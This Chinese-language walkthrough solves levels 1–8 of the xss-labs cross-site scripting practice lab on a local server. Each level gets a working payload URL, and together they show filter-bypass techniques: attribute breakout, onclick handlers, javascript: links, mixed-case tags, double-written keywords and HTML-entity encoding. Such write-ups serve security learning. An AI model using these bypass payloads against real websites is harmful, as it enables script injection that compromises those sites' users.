Level1
输入内容会发现内容出现在<h>标签中,直接访问发现成功
http://127.0.0.1/xss-labs/level1.php?name=test<script>alert(123)</script>#;
Level2
输入内容发现出现在<input> 标签的value属性中,闭合value属性即可
http://127.0.0.1/xss-labs/level2.php?keyword=test"><script>alert(111)</script>;
Level3
这次我们输入内容发现内容出现在<input>的value属性中,尝试用”>闭合,结果无法闭合,而尝试用'闭合,发现可以闭合value属性,由于>被过滤,所以我们使用onclick尝试,点击输入框发现尝试成功
http://127.0.0.1/xss-labs/level3.php?keyword='onclick='alert(1)&submit=搜索
#前一个‘用来闭合value,后一个用来完成onclick='xxx'的语法
Level4
这次我们输入内容发现跟level3一样出现在<input>的value属性中,尝试"闭合value成功,但是尝试>闭合失败,说明被过滤,尝试onclick属性,点击输入框,尝试成功
http://127.0.0.1/xss-labs/level4.php?keyword=try"onclick='alert(1)'&submit=搜索
Level5
这次我们输入内容发现与上一关出现位置相同,测试"闭合value,发现闭合成功,尝试>
闭合,发现也成功,开始尝试<script>发现被改为<scr_ipt>无法完成,再次尝试onclick
发现'被过滤了而且onclick被改为on_click,尝试使用<a>标签将变为超链接,在链接中使用javascript伪代码尝试,点击超链接,发现尝试成功
http://127.0.0.1/xss-labs/level5.php?keyword=find"><a href="javascript:alert(1)">111</a>&submit=搜索
Level6
我们输入后发现与上一关是一样的<script>和<onclick>都被加了下划线无法使用,且可以用">闭合,尝试使用<a>标签,发现href被改为了hr_ef,我们在尝试大小写<sCript>发现成功绕过
http://127.0.0.1/xss-labs/level6.php?keyword=break"><sCript>alert(1)</sCript>&submit=搜索
Level7
这次我们直接尝试">的闭合,<script>、<onclick>、herf,结果发现可以闭合,但是后面三者均被过滤了,我们可以尝试双写绕过<scscriptript>或者<oonnclick hrhrefef=>,发现成功绕过
http://127.0.0.1/xss-labs/level7.php?keyword=move"oonnclick=javascript:alert(1)>&submit=搜索
#或者
http://127.0.0.1/xss-labs/level7.php?keyword=move"><scrscriptipt>alert(1)</scrscriptipt>&submit=搜索
Level8
我们输入内容发现同样出现在value中,而且也出现在了 超链接中,这里我们尝试">闭合,发现无法闭合,尝试从超链接出发,发现javascript也被修改为javascr_ipt,这里我们可以利用a标签的自动unicode解码属性绕过,我们对javascript:alert(1)进行Unicode编码(模式为HTML)得到javascript:alert(1),放入文本框中,点击添加友情链接,之后点击友情链接即可绕过
http://127.0.0.1/xss-labs/level8.php?keyword=%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2349%3B%26%2341%3B&submit=添加友情链接